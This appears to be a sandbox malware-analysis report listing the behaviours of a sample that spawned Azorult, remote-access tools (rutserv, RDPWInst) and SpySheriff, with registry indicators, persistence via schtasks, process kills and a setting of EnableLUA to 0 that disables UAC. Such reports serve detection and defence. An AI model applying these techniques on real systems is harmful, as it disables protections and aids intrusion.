\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 4 IoCs
pid pid_target Process procid_target 460 1324 WerFault.exe 145 4360 5768 WerFault.exe 148 5124 4184 WerFault.exe 159 2460 5144 WerFault.exe 161 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpySheriff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpySheriff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language R8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 2160 timeout.exe 5716 timeout.exe 1932 timeout.exe 5476 timeout.exe 5992 timeout.exe 3976 timeout.exe 4868 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4116 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 2700 taskkill.exe 1412 taskkill.exe 5680 taskkill.exe 5992 taskkill.exe 4312 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" msedge.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} msedge.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database winit.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4376 NOTEPAD.EXE -
Runs .reg file with regedit 2 IoCs
pid Process 4868 regedit.exe 2416 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5508 schtasks.exe 4772 schtasks.exe 520 schtasks.exe 1940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5848 msedge.exe 5848 msedge.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 5316 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 4676 Azorult.exe 1748 rutserv.exe 1748 rutserv.exe 1748 rutserv.exe 1748 rutserv.exe 1748 rutserv.exe 1748 rutserv.exe 3112 rutserv.exe 3112 rutserv.exe 3416 rutserv.exe 3416 rutserv.exe 6124 rutserv.exe 6124 rutserv.exe 6124 rutserv.exe 6124 rutserv.exe 6124 rutserv.exe 6124 rutserv.exe 5284 rfusclient.exe 5284 rfusclient.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe 4900 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5188 taskhostw.exe 708 OpenWith.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 672 Process not Found 672 Process not Found 672 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs
pid Process 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4344 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1748 rutserv.exe Token: SeDebugPrivilege 3416 rutserv.exe Token: SeTakeOwnershipPrivilege 6124 rutserv.exe Token: SeTcbPrivilege 6124 rutserv.exe Token: SeTcbPrivilege 6124 rutserv.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 3252 powershell.exe Token: SeDebugPrivilege 5680 taskkill.exe Token: SeAuditPrivilege 4348 svchost.exe Token: SeDebugPrivilege 5988 RDPWInst.exe Token: SeAuditPrivilege 1844 svchost.exe Token: SeDebugPrivilege 5992 taskkill.exe Token: SeDebugPrivilege 4312 taskkill.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe 4936 msedge.exe -
Suspicious use of SetWindowsHookEx 32 IoCs
pid Process 4676 Azorult.exe 5316 Azorult.exe 6116 wini.exe 4900 winit.exe 1748 rutserv.exe 3112 rutserv.exe 5092 cheat.exe 3416 rutserv.exe 4312 ink.exe 6124 rutserv.exe 5388 taskhost.exe 1216 P.exe 4184 R8.exe 5188 taskhostw.exe 5356 winlogon.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe 708 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4936 wrote to memory of 2316 4936 msedge.exe 87 PID 4936 wrote to memory of 2316 4936 msedge.exe 87 PID 4936 wrote to memory of 3476 4936 msedge.exe 88 PID 4936 wrote to memory of 3476 4936 msedge.exe 88 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 2928 4936 msedge.exe 89 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 PID 4936 wrote to memory of 1116 4936 msedge.exe 90 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 3936 attrib.exe 5620 attrib.exe 2200 attrib.exe 3920 attrib.exe 5668 attrib.exe 3016 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef2202⤵PID:2316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:32⤵
- Downloads MZ/PE file
PID:3476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:82⤵PID:1116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:12⤵PID:744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:12⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:22⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:82⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:82⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:82⤵PID:4428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:82⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:82⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:82⤵PID:1796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:82⤵PID:2748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:82⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:82⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:82⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:82⤵PID:3976
-
-
